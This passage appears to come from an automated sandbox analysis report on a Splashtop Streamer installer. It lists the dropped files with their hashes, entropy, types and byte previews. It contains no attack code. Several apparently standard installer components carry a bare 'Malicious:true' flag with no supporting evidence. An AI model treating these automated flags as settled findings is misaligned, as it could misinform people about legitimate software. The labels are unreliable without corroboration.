                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.896157399444813
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:M9tl9yREhb42jcvlftvY5RL2vu2K2KTYJ1EbH18sggSNOCZ174h5o1YL6yTlNhRY:M9tcu4Jlft1223K61EjNSNOWih5y38lu
                                                                                                                                                                                                                                                                                                                                  MD5:99A6A9656DA926AF8AA648D50B47DCFB
                                                                                                                                                                                                                                                                                                                                  SHA1:81DB96003BD8F63250ABC7E59FB35E0227D3F28A
                                                                                                                                                                                                                                                                                                                                  SHA-256:FDF1F9D0AF4FF8E5CBD4387D6849327E91F0EEDD1BEFE58D7DD8B6EC40E90A98
                                                                                                                                                                                                                                                                                                                                  SHA-512:16E850FDABF76A11ED4176E0FD57DAFB64FAF9551EA220D003C5A86AFF8C39AB40D66F7AC7FCC6EF71CFA7E1D6268BBC23E32AA5CF69DF58A5D05F666701F3C0
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........t.....................V................................................................................Rich...........................PE..L......e...........!...&.....P.......b.......p......................................3.....@.........................lt...>...s.......p...................(..$.......................................|d..............................................UPX0....................................UPX1................................@....rsrc....P...p...D..................@......................................................................................................................................................................................................................................................................................................................................................4.01.UPX!....

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Temp\unpack\run.bat

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\Temp\SplashtopStreamer.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):2.9995812306460645
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3:1X6AZJ:1qAX
                                                                                                                                                                                                                                                                                                                                  MD5:56884732C1B8ABCBA0A31746DF533D97
                                                                                                                                                                                                                                                                                                                                  SHA1:662FA5002ACCB46261763B57F6A772E0A2AA5DDF
                                                                                                                                                                                                                                                                                                                                  SHA-256:A6212DAAA9A377B202A9436D80AB97BC9B0050DC7E174FCD35F255B34500CFAB
                                                                                                                                                                                                                                                                                                                                  SHA-512:8D5817660238082002FB42447D3B614C5099C8C691D4D091BE54BDDC5958A854628083BCCA191E6E45C85E70A8C6DCB5D2CBB4E2A3E5D255F5695139347E539C
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:PreVerCheck.exe

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Temp\unpack\setup.ini

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\Temp\SplashtopStreamer.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Generic INItialization configuration [REGPATH]
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1528
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.6192017888227515
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:24:Zem6aTKgWT8SoBz09LAjUeiKbd8fusQK5oqAeEVhqY0+c8Eo/VoijXOR+7G2eHNl:gi+Noh0dBeNbMoqvEV0Y0+bjjXD7FwNl
                                                                                                                                                                                                                                                                                                                                  MD5:FC5DE1FEA9170B61439922A367A12478
                                                                                                                                                                                                                                                                                                                                  SHA1:96941D31908B0CB49ADEABBDFCC43508F2B99B36
                                                                                                                                                                                                                                                                                                                                  SHA-256:087BA98D89B1E1366D04A909AC09D109BB80A872B6D5C38E29568DBEE5B116F1
                                                                                                                                                                                                                                                                                                                                  SHA-512:6423294E13EA896CE12E8369101CDEAF6EB467CC60A2852E5145BE12CD8EE1189A8508A59FAF504BB4BC90593F451EC09291662E6BD43438BBCAC57F2B69613B
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:[CUSTOMSETTING]..REGEXTSECT=Splashtop Remote Server for Business..INSTDRV=0x81..BASEDTYPE=1....[REGPATH]..NUM=2..REGPATH_01=Splashtop Remote Server..REGPATH_02=Splashtop Remote Server for Business....;Common..[REGISTRY]..CSRSMode=1..confirm_d=1..EnableNvFBC=@NO:0..EnableADEM=@NO:0....;STE..[REGISTRY_Splashtop Remote Server for Business]..EnableAutoUpgrade=0..CloudUserAgent=@SX:business..EnableIQSV=0..USERTRACK_NAME=@SO:SCRS00....[PREVERCHECK]..PRODUCTID={B7C5EA94-B96A-41F5-BE95-25D78B486678}..UPGRADEID={001F085C-058A-480B-AD56-2940B857C38D}..PRODUCTNAME=Splashtop Streamer..SSUNAME=PROTOIRIS00..SSUPRODUCT=SVR..COMPATIBLE_NUM=4....[PREVERCHECKREG]..REGKEYPATH_NUM=2..REGKEYPATH_MAIN=0..REGKEYPATH_0=Splashtop Remote Server,1..REGKEYPATH_1=Splashtop Remote Server for Business,0....;ST2..[COMPATIBLE_0]..PRODUCTID={2EFEAD58-3311-4B2B-9D8A-8D663581D109}..UPGRADEID={001F085C-058A-480B-AD56-2940B857C38D}..SSUNAME=PROTOIRIS00..FORCESTEMODE=0....;S4B Prodcut name with Splashtop Streamer for Busine

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Temp\unpack\setup.msi

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\Temp\SplashtopStreamer.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 936, Title: Installation Database, Subject: Splashtop Streamer, Author: Splashtop Inc., Keywords: Installer,MSI,Database, Comments: Splashtop Streamer Installer, Create Time/Date: Fri Sep 13 17:31:18 2024, Name of Creating Application: InstallShield?2021 27, Security: 1, Template: Intel;0,1033,2052,1028,1036,1031,1040,1041,1042,1046,1049,1034, Last Saved By: Intel;2052, Revision Number: {B7C5EA94-B96A-41F5-BE95-25D78B486678}3.7.2.0;{B7C5EA94-B96A-41F5-BE95-25D78B486678}3.7.2.0;{001F085C-058A-480B-AD56-2940B857C38D}, Number of Pages: 200, Number of Characters: 1
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):53136896
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.963270308775673
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:786432:kB4DOC/YOGmsS/FcbNbDm87ViwLTCg2m+5iYeVhV4ASHQy6UUZwNSG3bZ:VDO0GVUINbD5gwLz2mu2/3YZh3bZ
                                                                                                                                                                                                                                                                                                                                  MD5:ACF51C28B5EF5F78EE2A1F6800EDF813
                                                                                                                                                                                                                                                                                                                                  SHA1:CD52386AE838919C9D2813FF6179D7EC94B45B92
                                                                                                                                                                                                                                                                                                                                  SHA-256:82D4B1E2F38A8955F870232706CCE5193CD044F37C5414FED128F5DA846957B9
                                                                                                                                                                                                                                                                                                                                  SHA-512:C9200CEEC6F81A63DE63CD1038BC3B18D98B83B8DC738A2D02A7FF295F79312A57A60D4EFE904ACC2696C4E157D722C09ECF943AF0C1257EAFA6B8D9C3655852
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:......................>...................+...............8........6........................................................................................................................................................................................................................................................................... ... ...!...!..."..."...#...#...$...$...%...%...&...&...'...'...(...(...)...)...*...*...+...+...,...,...-...-......./.../...0...0...1...1...2...2...3...3...4...4...5...5...6..........;...................H............................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...B...M...:...<.......=...........@...A...:...C...D...E...F...G...H...I...J...N...L...........O...P...Q...R...S...T...U...Z...W...X...Y...0...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Temp\unpack\uninst.iss

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\Temp\SplashtopStreamer.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):988
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.127699291644866
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12:RjUcBbUcBIP+ijUcBIDQUcBIPEUcBIDv0zWatYh7+ifPcPvo7PZn+i4TjnPTvY:9UQUhGijU90UhMU9odOyifEIzZ+i4PPc
                                                                                                                                                                                                                                                                                                                                  MD5:5DBDCF8D475069C447F676D56327382B
                                                                                                                                                                                                                                                                                                                                  SHA1:08A0CA9150DCFA9D46370A340F000504D7772032
                                                                                                                                                                                                                                                                                                                                  SHA-256:EDAC85170F8B70F30E7F7080B34664B186B635520FFBC011CD9AB6257BAB78A8
                                                                                                                                                                                                                                                                                                                                  SHA-512:81CE6716D4F58CEA4194FA5FF42EE22C2D2686DD0A097DC384E797411587A2071A4070E3ECF5B7E9571FF5D29C2DFD0ED197B6890D70BDFECE376E7E0340CEE1
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:;Unistall..[{B7C5EA94-B96A-41F5-BE95-25D78B486678}-DlgOrder]..Dlg0={B7C5EA94-B96A-41F5-BE95-25D78B486678}-MessageBox-0..Count=2..Dlg1={B7C5EA94-B96A-41F5-BE95-25D78B486678}-SdFinish-0..[{B7C5EA94-B96A-41F5-BE95-25D78B486678}-MessageBox-0]..Result=6..[{B7C5EA94-B96A-41F5-BE95-25D78B486678}-SdFinish-0]..Result=1..bOpt1=0..bOpt2=0....;Unistall 140..[{9FF58A31-D391-4FEE-BBE6-61CCD093EF13}-DlgOrder]..Dlg0={9FF58A31-D391-4FEE-BBE6-61CCD093EF13}-MessageBox-0..Count=2..Dlg1={9FF58A31-D391-4FEE-BBE6-61CCD093EF13}-SdFinish-0..[{9FF58A31-D391-4FEE-BBE6-61CCD093EF13}-SdFinish-0]..Result=1..bOpt1=0..bOpt2=0..[{9FF58A31-D391-4FEE-BBE6-61CCD093EF13}-MessageBox-0]..Result=6..[{94A1911F-CD2F-4B9C-B171-2B43DCD213AA}-DlgOrder]..Dlg0={94A1911F-CD2F-4B9C-B171-2B43DCD213AA}-MessageBox-0..Count=2..Dlg1={94A1911F-CD2F-4B9C-B171-2B43DCD213AA}-SdFinish-0..[{94A1911F-CD2F-4B9C-B171-2B43DCD213AA}-MessageBox-0]..Result=6..[{94A1911F-CD2F-4B9C-B171-2B43DCD213AA}-SdFinish-0]..Result=1..bOpt1=0..bOpt2=0..

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Temp\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\ISRT.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, PECompact2 compressed
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):437800
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.973112188633512
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:lj90SzD7w142fX+Tz8uOoigpDgQ+o4io1AVmeF7+Vp6b4aFUQPy39/A1TM0nq52r:Ruo7/zz81oi6DgQ+poASaPzMUQM8MAoM
                                                                                                                                                                                                                                                                                                                                  MD5:85315AD538FA5AF8162F1CD2FCE1C99D
                                                                                                                                                                                                                                                                                                                                  SHA1:31C177C28A05FA3DE5E1F934B96B9D01A8969BBA
                                                                                                                                                                                                                                                                                                                                  SHA-256:70735B13F629F247D6AF2BE567F2DA8112039FBCED5FBB37961E53A2A3EC1EC7
                                                                                                                                                                                                                                                                                                                                  SHA-512:877EB3238517EEB87C2A5D42839167E6C58F9CA7228847DB3D20A19FB13B176A6280C37DECDA676FA99A6CCF7469569DDC0974ECCF4AD67514FDEDF9E9358556
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$...........A.YA.YA.Yf.mYG.Y..nY].Y..XC.Y..mY@.Y..mY..Y..lY..Y...Y@.Y...YE.YA.Y..Y...YV.Y..lY..Y..iY@.Y..jY@.YA.4Y@.Y..oY@.YRichA.Y................PE..L.....a...........!.....|...@...............................................@......................................p...................h...............($...0.........8...................................................DU..@....................text............P......PEC2MO...... ....rsrc....@.......4...T.............. ....reloc.......0......................@...........................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Temp\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\IsConfig.ini

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Generic INItialization configuration [f9]
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):571
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.1920034114741345
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12:sWCV4ygUcB2bbaxRjWIRLLN+eQ1LLmZLL7vLLB103e4ItDAdtDP4XMXLKxBo3XLc:sWCVQUNW53p5tDutDQcLKxunLKxQto
                                                                                                                                                                                                                                                                                                                                  MD5:DE10BE3435FBCAB7EECCAA67E2431619
                                                                                                                                                                                                                                                                                                                                  SHA1:7AFDB3C4C042692EA3F19F2D2275BADA7CACFBFD
                                                                                                                                                                                                                                                                                                                                  SHA-256:D193EDA99410268676293D315164FF29CD263CA0251A0238592A23A9D78476B0
                                                                                                                                                                                                                                                                                                                                  SHA-512:BDA2F23885D4BB07C328622D7F637379F63F08B57EB54C4A665FB56D5F68E61D36FF4B4E3CC2B8B2B3D3C5F2E0D3DBB581770EEC4FDDF9A8C0F4B6555AD3C1AF
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:[SetupDefaults]..LangID=1033..ProductCode={B7C5EA94-B96A-41F5-BE95-25D78B486678}..TempPathGuid={C9EB51E3-2723-43F9-ADE8-79DDD04C17A9}..[f9]..Function=CA_ConflictCheck..[f6]..Function=CA_Finished..[f14]..Function=CA_Init..[f5]..Function=CA_InstDone..[f1]..Function=CA_InstSSU..[f3]..Function=CA_InstSrvAndDrv..[f10]..Function=CA_PostCleanup..[f13]..Function=CA_PreCleanup..[f7]..Function=CA_PreStopProcess..[f11]..Function=CA_StopProcess..[f8]..Function=CA_UIIsMaintenance..[f4]..Function=CA_UninstSSU..[f2]..Function=CA_UninstSrvAndDrv..[f12]..Function=CA_UpdateSetting..

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Temp\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\String1033.txt

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with very long lines (332), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):186494
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.6614874204671106
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:gSeMLR6/K41+BrChTHB8Xd12hWA/z+wuUZU6rPsHnQvvOuyMJice1VOL27p6:gmLu1xTh84W9CoeT
                                                                                                                                                                                                                                                                                                                                  MD5:1D4329601BEF6492CD3227DF5BCD5125
                                                                                                                                                                                                                                                                                                                                  SHA1:D03A3C50BA7663B52C13B54B08B9284F40E4F848
                                                                                                                                                                                                                                                                                                                                  SHA-256:BD703470B2F35E3C4D917D3038BF806FCC7C155142D300806C95500274951EFD
                                                                                                                                                                                                                                                                                                                                  SHA-512:B0CFC1AEF000D428D1FF4F2DF41539284A048571E26A2C1A217093E593E546F5AF79BBC61BE8458021A9829A7D79F68CB8728BF942475096B53C81A66094DD7B
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:..C.O.M.P.A.N.Y._.N.A.M.E.=.S.p.l.a.s.h.t.o.p. .I.n.c.......D.N._.A.l.w.a.y.s.I.n.s.t.a.l.l.=.A.l.w.a.y.s. .I.n.s.t.a.l.l.....I.D.D.R.O.P._.S.R.S._.C.O.N.F.L.I.C.T.E.D.=.T.h.e. .[.P.r.o.d.u.c.t.N.a.m.e.]. .i.n.s.t.a.l.l.a.t.i.o.n. .o.n. .t.h.i.s. .c.o.m.p.u.t.e.r. .w.a.s. .f.a.i.l.e.d... .M.a.k.e. .s.u.r.e. .y.o.u.'.v.e. .u.n.i.n.s.t.a.l.l.e.d. .a.n.y. .p.r.e.v.i.o.u.s.l.y. .i.n.s.t.a.l.l.e.d. .s.o.f.t.w.a.r.e. .b.e.f.o.r.e. .i.n.s.t.a.l.l.i.n.g. .[.P.r.o.d.u.c.t.N.a.m.e.].......I.D.P.R.O.P._.E.X.P.R.E.S.S._.L.A.U.N.C.H._.C.O.N.D.I.T.I.O.N._.A.C.R.O.B.A.T.5.F.O.L.D.E.R.=. . . .A.d.o.b.e. .A.c.r.o.b.a.t. .5. .n.e.e.d.s. .t.o. .b.e. .i.n.s.t.a.l.l.e.d. .f.o.r. .t.h.i.s. .i.n.s.t.a.l.l.a.t.i.o.n. .t.o. .c.o.n.t.i.n.u.e.......I.D.P.R.O.P._.E.X.P.R.E.S.S._.L.A.U.N.C.H._.C.O.N.D.I.T.I.O.N._.A.D.O.B.E.R.E.A.D.E.R.1.0.F.O.L.D.E.R.=.A.d.o.b.e. .R.e.a.d.e.r. .1.0. .n.e.e.d.s. .t.o. .b.e. .i.n.s.t.a.l.l.e.d. .f.o.r. .t.h.i.s. .i.n.s.t.a.l.l.a.t.i.o.n. .t.o. .c.o.n.t.i.n.u.e.......I.D.P.R.O.P._.E.

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Temp\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):183856
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.777994123339856
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:MIFNKUw8ALJ+C2T0FSmmiYQT4nF2E+JYjdeZ2bgA/qVzs:AUn0mT8Sc/T4F1bpxg8z
                                                                                                                                                                                                                                                                                                                                  MD5:7A1C100DF8065815DC34C05ABC0C13DE
                                                                                                                                                                                                                                                                                                                                  SHA1:3C23414AE545D2087E5462A8994D2B87D3E6D9E2
                                                                                                                                                                                                                                                                                                                                  SHA-256:E46C768950AAD809D04C91FB4234CB4B2E7D0B195F318719A71E967609E3BBED
                                                                                                                                                                                                                                                                                                                                  SHA-512:BBEC114913BC2F92E8DE7A4DD9513BFF31F6B0EF4872171B9B6B63FEF7FAA363CF47E63E2D710DD32E9FC84C61F828E0FAE3D48D06B76DA023241BEE9D4A6327
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......e.*.!.D.!.D.!.D../..D.D../..(.D../....D.... .D.!.E.[.D......D.....%.D..... .D.!.. .D..... .D.Rich!.D.........................PE..d...d.a.........."......X...v.................@....................................s{....`..................................................J..........`.......$.......0$..........`t..8...............................p............p...............................text....W.......X.................. ..`.rdata.......p.......\..............@..@.data... B...`.......D..............@....pdata..$............`..............@..@.rsrc...`............v..............@..@.reloc..............................@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Temp\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isres_0x0409.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1864872
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.69189927762803
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:ds4d9dfaOdWJIApJCPtjvntnSb8COevQonCLPub+7NPS:dhrWiADCPtjvntnSb8COevQonCftS
                                                                                                                                                                                                                                                                                                                                  MD5:BEFE2EF369D12F83C72C5F2F7069DD87
                                                                                                                                                                                                                                                                                                                                  SHA1:B89C7F6DA1241ED98015DC347E70322832BCBE50
                                                                                                                                                                                                                                                                                                                                  SHA-256:9652FFAE3F5C57D1095C6317AB6D75A9C835BB296E7C8B353A4D55D55C49A131
                                                                                                                                                                                                                                                                                                                                  SHA-512:760631B05EF79C308570B12D0C91C1D2A527427D51E4E568630E410B022E4BA24C924D6D85BE6462BA7F71B2F0BA05587D3EC4B8F98FCDB8BB4F57949A41743B
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^..(...{...{...{...{...{,..{J..{...{P..{..{...{,..{...{..{...{Rich...{........PE..L...4..a...........!.........................................................p......Q<.......................................@..(....P..9...........pP..8$...@.......................................................A...............................text...@........................... ..`.rdata........... ..................@..@.data....f.......P..................@....idata.......@....... ..............@....rsrc...9....P.......0..............@..@.reloc...)...@...0... ..............@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Temp\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\setup.inx

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):353888
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.39949998550144
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:jfLdZMDVq3/HvkZe6hTYYmWyQ98js8sNWo2vBg3vu:jzsDVq3/HB6hzyIhUfvBF
                                                                                                                                                                                                                                                                                                                                  MD5:0376DD5B7E37985EA50E693DC212094C
                                                                                                                                                                                                                                                                                                                                  SHA1:02859394164C33924907B85AB0AADDC628C31BF1
                                                                                                                                                                                                                                                                                                                                  SHA-256:C9E6AF6FB0BDBEB532E297436A80EB92A2FF7675F9C777C109208EE227F73415
                                                                                                                                                                                                                                                                                                                                  SHA-512:69D79D44908F6305EEE5D8E6F815A0FEE0C6D913F4F40F0C2C9F2F2E50F24BF7859EBE12C85138D971E5DB95047F159F077AE687989B8588F76517CAB7D3E0D5
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:t.,....(... <$.M. .=..........l.............o.c...gWSl..SW..WS[//d.d l$.XX%.......................q.y}aD%mQ.Y]A..M1...!.)........................................}...m..q]}}aMm.U=].E-M.5.=.%.-.......................e.......G.....v.@....qeymee1m.......c.)!!.)g..?.....K.7.+.OH..... .D@..0....e..dXH......P..(..]UU-]......kS.kk.....C.WO7'.[.<X44....,..$.8... ...}..\......@.5km!U.gL.8..g....-....._..k#+G##.LP8.H.@......0...T.......Y..D.........1II.1.o.s..Cg..G.....O.Og.CL<L.P.......p.d$........Y..L......<.. ...III.1..k_.....o.oGO?.....H.,@.X.P. ......p..,...\......m..<.....]YMEE.M..w[..[..{os.....O.C_G.t$l.D8\..........,.......}..]..`.........)5M.5.o.W_...sO3.SGk....h$.`,...4.L.$.<..........@...d...e}}1e.D.....o...S)!!.)g.GsK?..0.....#.h$P(.\\...........x(..am.I...p....H.......=9.!S3.wgksK.......3[C ......(.......,...........q.ayyaa.YQQYYc9E%11%9._.......W{7;wSo.......`(h<......L.4..........ay.q...a}Qii]Q....5MM!5.wSl.-.....w'.+k3/..+d.....

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Temp\{3302634C-E4F1-4E20-978A-65EAB068911F}\ISRT.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, PECompact2 compressed
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):437800
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.973112188633512
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:lj90SzD7w142fX+Tz8uOoigpDgQ+o4io1AVmeF7+Vp6b4aFUQPy39/A1TM0nq52r:Ruo7/zz81oi6DgQ+poASaPzMUQM8MAoM
                                                                                                                                                                                                                                                                                                                                  MD5:85315AD538FA5AF8162F1CD2FCE1C99D
                                                                                                                                                                                                                                                                                                                                  SHA1:31C177C28A05FA3DE5E1F934B96B9D01A8969BBA
                                                                                                                                                                                                                                                                                                                                  SHA-256:70735B13F629F247D6AF2BE567F2DA8112039FBCED5FBB37961E53A2A3EC1EC7
                                                                                                                                                                                                                                                                                                                                  SHA-512:877EB3238517EEB87C2A5D42839167E6C58F9CA7228847DB3D20A19FB13B176A6280C37DECDA676FA99A6CCF7469569DDC0974ECCF4AD67514FDEDF9E9358556
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$...........A.YA.YA.Yf.mYG.Y..nY].Y..XC.Y..mY@.Y..mY..Y..lY..Y...Y@.Y...YE.YA.Y..Y...YV.Y..lY..Y..iY@.Y..jY@.YA.4Y@.Y..oY@.YRichA.Y................PE..L.....a...........!.....|...@...............................................@......................................p...................h...............($...0.........8...................................................DU..@....................text............P......PEC2MO...... ....rsrc....@.......4...T.............. ....reloc.......0......................@...........................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Temp\{3302634C-E4F1-4E20-978A-65EAB068911F}\IsConfig.ini

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Generic INItialization configuration [f9]
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):571
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.1920034114741345
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12:sWCV4ygUcB2bbaxRjWIRLLN+eQ1LLmZLL7vLLB103e4ItDAdtDP4XMXLKxBo3XLc:sWCVQUNW53p5tDutDQcLKxunLKxQto
                                                                                                                                                                                                                                                                                                                                  MD5:DE10BE3435FBCAB7EECCAA67E2431619
                                                                                                                                                                                                                                                                                                                                  SHA1:7AFDB3C4C042692EA3F19F2D2275BADA7CACFBFD
                                                                                                                                                                                                                                                                                                                                  SHA-256:D193EDA99410268676293D315164FF29CD263CA0251A0238592A23A9D78476B0
                                                                                                                                                                                                                                                                                                                                  SHA-512:BDA2F23885D4BB07C328622D7F637379F63F08B57EB54C4A665FB56D5F68E61D36FF4B4E3CC2B8B2B3D3C5F2E0D3DBB581770EEC4FDDF9A8C0F4B6555AD3C1AF
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
